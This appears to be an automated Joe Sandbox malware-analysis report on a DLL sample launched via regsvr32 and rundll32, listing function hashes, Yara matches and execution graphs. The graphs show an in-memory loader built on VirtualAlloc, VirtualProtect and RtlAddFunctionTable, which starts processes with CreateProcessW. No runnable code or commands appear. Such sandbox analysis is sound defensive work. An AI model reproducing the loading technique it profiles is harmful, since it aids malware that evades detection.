                                                                                                                              • Part of subcall function 00007FFC66D73024: _errno.LIBCMT ref: 00007FFC66D73044
                                                                                                                              • Part of subcall function 00007FFC66D73024: GetLastError.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7304C
                                                                                                                            • free.LIBCMT ref: 00007FFC66D758F5
                                                                                                                            • free.LIBCMT ref: 00007FFC66D75911
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2294642566-0
                                                                                                                            • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                            • Instruction ID: c612870f44baa8b7de1339a8248ed978ec20d4cec3b03e187a4bc5c0c92f20d1
                                                                                                                            • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                            • Instruction Fuzzy Hash: 5A51D636A0CAA9C2EB14DF1AE80016DA795FB84B98F484035DECD4B784DF3CD846DB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3186804695-0
                                                                                                                            • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                            • Instruction ID: e26427076851ade398a2b2a52d33a999349e95a58029be5bf11b9aa7a36a5822
                                                                                                                            • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                            • Instruction Fuzzy Hash: 3081AE72A0969AD6DB28CF25E1847AABBA0FB84744F504135DB8D4BB54EF3CE410DF11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4201827665-0
                                                                                                                            • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                            • Instruction ID: f9fd4d862d04db8030c2af31baca5c93bcf161c0e8378cacb0529c4d5c55445a
                                                                                                                            • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                            • Instruction Fuzzy Hash: A5517031A0C6AAC6F7589B2698547BEAA91FF44784F104039DD8D4F791DE7CE440EB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$DecodePointercalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1531210114-0
                                                                                                                            • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                            • Instruction ID: 924e130fa58063c88d2474479412e6d0a116e3faf618e27f66f7f892a4428856
                                                                                                                            • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                            • Instruction Fuzzy Hash: 6221A732A1D76AC5FB289B55941177AA690AF847C0F444434DB8C0FB86EF3CD410DB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _lock.LIBCMT ref: 00007FFC66D753B2
                                                                                                                            • free.LIBCMT ref: 00007FFC66D753D7
                                                                                                                              • Part of subcall function 00007FFC66D73024: HeapFree.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7303A
                                                                                                                              • Part of subcall function 00007FFC66D73024: _errno.LIBCMT ref: 00007FFC66D73044
                                                                                                                              • Part of subcall function 00007FFC66D73024: GetLastError.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7304C
                                                                                                                            • _lock.LIBCMT ref: 00007FFC66D753F2
                                                                                                                            • free.LIBCMT ref: 00007FFC66D75438
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188102813-0
                                                                                                                            • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                            • Instruction ID: 23dd1b27ea70366d402bde2eaaa6c551f6b2f6a00ec88478414b862772dd27d8
                                                                                                                            • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                            • Instruction Fuzzy Hash: 8011A531A0E56AC1FF5D9B72C41137CA6909F44708F044134D79E0E2D5EE2CA841EB33
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalDeleteSection$Freefree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1250194111-0
                                                                                                                            • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                            • Instruction ID: 3985bddf413706d29070dee63a9126708635cdaf6e5d0ebca692a83ff1b52b62
                                                                                                                            • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                            • Instruction Fuzzy Hash: B4116031E0C6BAC6EA1C8F16E84413CAB60FB40B54F588534D6AD0A795DF3CE491DF21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _lock$Sleep_errno_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2111406555-0
                                                                                                                            • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                            • Instruction ID: 8fba34edc2ab18029c6a4ebca4beeac4ffa9560727ebeab240709872b27e68aa
                                                                                                                            • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                            • Instruction Fuzzy Hash: D0015221A0D6AAC6F74C6B76D45176DAA50EF44784F448034E68D0B3C6DE2CA850EB73
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_getptd
                                                                                                                            • String ID: #
                                                                                                                            • API String ID: 3432092939-1885708031
                                                                                                                            • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                            • Instruction ID: 828d92e906a34dae299c06fa6a841315cf049c25599e36566697e8878b30f58f
                                                                                                                            • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                            • Instruction Fuzzy Hash: DC519F22A0CAD9C5E7248F25E4402BEAFA0F781B80F584132DACD1B799CE3DD841DF12
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                            • Instruction ID: e2ff06906ce97767f100635cdb7f2bc749626cef3a3181dbc411939cf4c3182e
                                                                                                                            • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                            • Instruction Fuzzy Hash: 5651C333A0C6A9C5EB689F16E4401B9BBA0BB85B90F544535DBDD4F781CE3CE441EB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,$,$2S=$i`}G
                                                                                                                            • API String ID: 0-4285990414
                                                                                                                            • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                            • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                            • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                            • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:12.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:32
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 3422 2687b6c0000 3423 2687b6c0183 3422->3423 3424 2687b6c043e VirtualAlloc 3423->3424 3428 2687b6c0462 3424->3428 3425 2687b6c0a7b 3426 2687b6c0531 GetNativeSystemInfo 3426->3425 3427 2687b6c056d VirtualAlloc 3426->3427 3432 2687b6c058b 3427->3432 3428->3425 3428->3426 3429 2687b6c0a00 3429->3425 3430 2687b6c0a56 RtlAddFunctionTable 3429->3430 3430->3425 3431 2687b6c09d9 VirtualProtect 3431->3432 3432->3429 3432->3431 3440 18000ac48 3441 18000ac8e 3440->3441 3443 18000b6ec 3441->3443 3444 180021c3c 3441->3444 3445 180021c97 3444->3445 3446 180001bdc CreateProcessW 3445->3446 3447 180021e38 3446->3447 3447->3443 3448 180003598 3451 180003640 3448->3451 3449 1800044c0 3450 180021c3c CreateProcessW 3450->3451 3451->3449 3451->3450 3433 180021c3c 3434 180021c97 3433->3434 3437 180001bdc 3434->3437 3436 180021e38 3438 180001c82 3437->3438 3439 180001d21 CreateProcessW 3438->3439 3439->3436 3452 1800097c0 3455 1800097fc 3452->3455 3453 180021c3c CreateProcessW 3454 180009924 3453->3454 3455->3453 3455->3454

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 2687b6c0000-2687b6c0460 call 2687b6c0aa8 * 2 VirtualAlloc 22 2687b6c0462-2687b6c0466 0->22 23 2687b6c048a-2687b6c0494 0->23 24 2687b6c0468-2687b6c0488 22->24 26 2687b6c0a91-2687b6c0aa6 23->26 27 2687b6c049a-2687b6c049e 23->27 24->23 24->24 27->26 28 2687b6c04a4-2687b6c04a8 27->28 28->26 29 2687b6c04ae-2687b6c04b2 28->29 29->26 30 2687b6c04b8-2687b6c04bf 29->30 30->26 31 2687b6c04c5-2687b6c04d2 30->31 31->26 32 2687b6c04d8-2687b6c04e1 31->32 32->26 33 2687b6c04e7-2687b6c04f4 32->33 33->26 34 2687b6c04fa-2687b6c0507 33->34 35 2687b6c0531-2687b6c0567 GetNativeSystemInfo 34->35 36 2687b6c0509-2687b6c0511 34->36 35->26 38 2687b6c056d-2687b6c0589 VirtualAlloc 35->38 37 2687b6c0513-2687b6c0518 36->37 39 2687b6c0521 37->39 40 2687b6c051a-2687b6c051f 37->40 41 2687b6c05a0-2687b6c05ac 38->41 42 2687b6c058b-2687b6c059e 38->42 44 2687b6c0523-2687b6c052f 39->44 40->44 43 2687b6c05af-2687b6c05b2 41->43 42->41 45 2687b6c05b4-2687b6c05bf 43->45 46 2687b6c05c1-2687b6c05db 43->46 44->35 44->37 45->43 48 2687b6c05dd-2687b6c05e2 46->48 49 2687b6c061b-2687b6c0622 46->49 50 2687b6c05e4-2687b6c05ea 48->50 51 2687b6c0628-2687b6c062f 49->51 52 2687b6c06db-2687b6c06e2 49->52 53 2687b6c05ec-2687b6c0609 50->53 54 2687b6c060b-2687b6c0619 50->54 51->52 55 2687b6c0635-2687b6c0642 51->55 56 2687b6c0864-2687b6c086b 52->56 57 2687b6c06e8-2687b6c06f9 52->57 53->53 53->54 54->49 54->50 55->52 60 2687b6c0648-2687b6c064f 55->60 58 2687b6c0917-2687b6c0929 56->58 59 2687b6c0871-2687b6c087f 56->59 61 2687b6c0702-2687b6c0705 57->61 62 2687b6c0a07-2687b6c0a1a 58->62 63 2687b6c092f-2687b6c0937 58->63 64 2687b6c090e-2687b6c0911 59->64 65 2687b6c0654-2687b6c0658 60->65 66 2687b6c0707-2687b6c070a 61->66 67 2687b6c06fb-2687b6c06ff 61->67 81 2687b6c0a40-2687b6c0a4a 62->81 82 2687b6c0a1c-2687b6c0a27 62->82 69 2687b6c093b-2687b6c093f 63->69 64->58 68 2687b6c0884-2687b6c08a9 64->68 70 2687b6c06c0-2687b6c06ca 65->70 71 2687b6c070c-2687b6c071d 66->71 72 2687b6c0788-2687b6c078e 66->72 67->61 101 2687b6c0907-2687b6c090c 68->101 102 2687b6c08ab-2687b6c08b1 68->102 78 2687b6c0945-2687b6c095a 69->78 79 2687b6c09ec-2687b6c09fa 69->79 76 2687b6c06cc-2687b6c06d2 70->76 77 2687b6c065a-2687b6c0669 70->77 73 2687b6c0794-2687b6c07a2 71->73 74 2687b6c071f-2687b6c0720 71->74 72->73 83 2687b6c085d-2687b6c085e 73->83 84 2687b6c07a8 73->84 80 2687b6c0722-2687b6c0784 74->80 76->65 85 2687b6c06d4-2687b6c06d5 76->85 89 2687b6c067a-2687b6c067e 77->89 90 2687b6c066b-2687b6c0678 77->90 87 2687b6c095c-2687b6c095e 78->87 88 2687b6c097b-2687b6c097d 78->88 79->69 91 2687b6c0a00-2687b6c0a01 79->91 80->80 96 2687b6c0786 80->96 99 2687b6c0a4c-2687b6c0a54 81->99 100 2687b6c0a7b-2687b6c0a8e 81->100 97 2687b6c0a38-2687b6c0a3e 82->97 83->56 98 2687b6c07ae-2687b6c07d4 84->98 85->52 103 2687b6c0960-2687b6c096c 87->103 104 2687b6c096e-2687b6c0979 87->104 92 2687b6c09a2-2687b6c09a4 88->92 93 2687b6c097f-2687b6c0981 88->93 94 2687b6c0680-2687b6c068a 89->94 95 2687b6c068c-2687b6c0690 89->95 105 2687b6c06bd-2687b6c06be 90->105 91->62 111 2687b6c09a6-2687b6c09aa 92->111 112 2687b6c09ac-2687b6c09bb 92->112 106 2687b6c0983-2687b6c0987 93->106 107 2687b6c0989-2687b6c098b 93->107 108 2687b6c06b6-2687b6c06ba 94->108 109 2687b6c06a5-2687b6c06a9 95->109 110 2687b6c0692-2687b6c06a3 95->110 96->73 97->81 115 2687b6c0a29-2687b6c0a35 97->115 131 2687b6c0835-2687b6c0839 98->131 132 2687b6c07d6-2687b6c07d9 98->132 99->100 116 2687b6c0a56-2687b6c0a79 RtlAddFunctionTable 99->116 100->26 101->64 113 2687b6c08b3-2687b6c08b9 102->113 114 2687b6c08bb-2687b6c08c8 102->114 117 2687b6c09be-2687b6c09bf 103->117 104->117 105->70 106->117 107->92 118 2687b6c098d-2687b6c098f 107->118 108->105 109->105 119 2687b6c06ab-2687b6c06b3 109->119 110->108 111->117 112->117 121 2687b6c08ea-2687b6c08fe 113->121 122 2687b6c08d3-2687b6c08e5 114->122 123 2687b6c08ca-2687b6c08d1 114->123 115->97 116->100 120 2687b6c09c5-2687b6c09cb 117->120 126 2687b6c0991-2687b6c0997 118->126 127 2687b6c0999-2687b6c09a0 118->127 119->108 128 2687b6c09cd-2687b6c09d3 120->128 129 2687b6c09d9-2687b6c09e9 VirtualProtect 120->129 121->101 139 2687b6c0900-2687b6c0905 121->139 122->121 123->122 123->123 126->117 127->120 128->129 129->79 133 2687b6c0844-2687b6c0850 131->133 134 2687b6c083b 131->134 136 2687b6c07e3-2687b6c07f0 132->136 137 2687b6c07db-2687b6c07e1 132->137 133->98 138 2687b6c0856-2687b6c0857 133->138 134->133 141 2687b6c07f2-2687b6c07f9 136->141 142 2687b6c07fb-2687b6c080d 136->142 140 2687b6c0812-2687b6c082c 137->140 138->83 139->102 140->131 144 2687b6c082e-2687b6c0833 140->144 141->141 141->142 142->140 144->132
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.280591999.000002687B6C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002687B6C0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_2687b6c0000_rundll32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                            • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                            • API String ID: 394283112-2517549848
                                                                                                                            • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction ID: 4018ae56d37c45f4f1294573cc86158f2e4ce05ba99b19479ded9068ab731c53
                                                                                                                            • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction Fuzzy Hash: B872E934518B488BDB59DF18CC897B9B7E1FB94304F20562DEA8AC3251DF35EA41CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 442 180001bdc-180001cab call 1800142a0 445 180001d21-180001d64 CreateProcessW 442->445 446 180001cad-180001d1b call 18000dd70 442->446 446->445
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.280399426.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID: :}
                                                                                                                            • API String ID: 963392458-2902022129
                                                                                                                            • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                            • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                                                                            • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                                                                            • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:11
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 3264 19895290000 3265 19895290183 3264->3265 3266 1989529043e VirtualAlloc 3265->3266 3269 19895290462 3266->3269 3267 19895290531 GetNativeSystemInfo 3268 1989529056d VirtualAlloc 3267->3268 3271 19895290a7b 3267->3271 3270 1989529058b 3268->3270 3269->3267 3269->3271 3272 19895290a00 3270->3272 3274 198952909d9 VirtualProtect 3270->3274 3272->3271 3273 19895290a56 RtlAddFunctionTable 3272->3273 3273->3271 3274->3270

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 19895290000-19895290460 call 19895290aa8 * 2 VirtualAlloc 22 19895290462-19895290466 0->22 23 1989529048a-19895290494 0->23 24 19895290468-19895290488 22->24 26 19895290a91-19895290aa6 23->26 27 1989529049a-1989529049e 23->27 24->23 24->24 27->26 28 198952904a4-198952904a8 27->28 28->26 29 198952904ae-198952904b2 28->29 29->26 30 198952904b8-198952904bf 29->30 30->26 31 198952904c5-198952904d2 30->31 31->26 32 198952904d8-198952904e1 31->32 32->26 33 198952904e7-198952904f4 32->33 33->26 34 198952904fa-19895290507 33->34 35 19895290531-19895290567 GetNativeSystemInfo 34->35 36 19895290509-19895290511 34->36 35->26 38 1989529056d-19895290589 VirtualAlloc 35->38 37 19895290513-19895290518 36->37 39 19895290521 37->39 40 1989529051a-1989529051f 37->40 41 198952905a0-198952905ac 38->41 42 1989529058b-1989529059e 38->42 43 19895290523-1989529052f 39->43 40->43 44 198952905af-198952905b2 41->44 42->41 43->35 43->37 46 198952905c1-198952905db 44->46 47 198952905b4-198952905bf 44->47 48 1989529061b-19895290622 46->48 49 198952905dd-198952905e2 46->49 47->44 51 19895290628-1989529062f 48->51 52 198952906db-198952906e2 48->52 50 198952905e4-198952905ea 49->50 53 1989529060b-19895290619 50->53 54 198952905ec-19895290609 50->54 51->52 55 19895290635-19895290642 51->55 56 19895290864-1989529086b 52->56 57 198952906e8-198952906f9 52->57 53->48 53->50 54->53 54->54 55->52 60 19895290648-1989529064f 55->60 58 19895290871-1989529087f 56->58 59 19895290917-19895290929 56->59 61 19895290702-19895290705 57->61 64 1989529090e-19895290911 58->64 62 19895290a07-19895290a1a 59->62 63 1989529092f-19895290937 59->63 65 19895290654-19895290658 60->65 66 19895290707-1989529070a 61->66 67 198952906fb-198952906ff 61->67 90 19895290a40-19895290a4a 62->90 91 19895290a1c-19895290a27 62->91 69 1989529093b-1989529093f 63->69 64->59 68 19895290884-198952908a9 64->68 70 198952906c0-198952906ca 65->70 71 19895290788-1989529078e 66->71 72 1989529070c-1989529071d 66->72 67->61 96 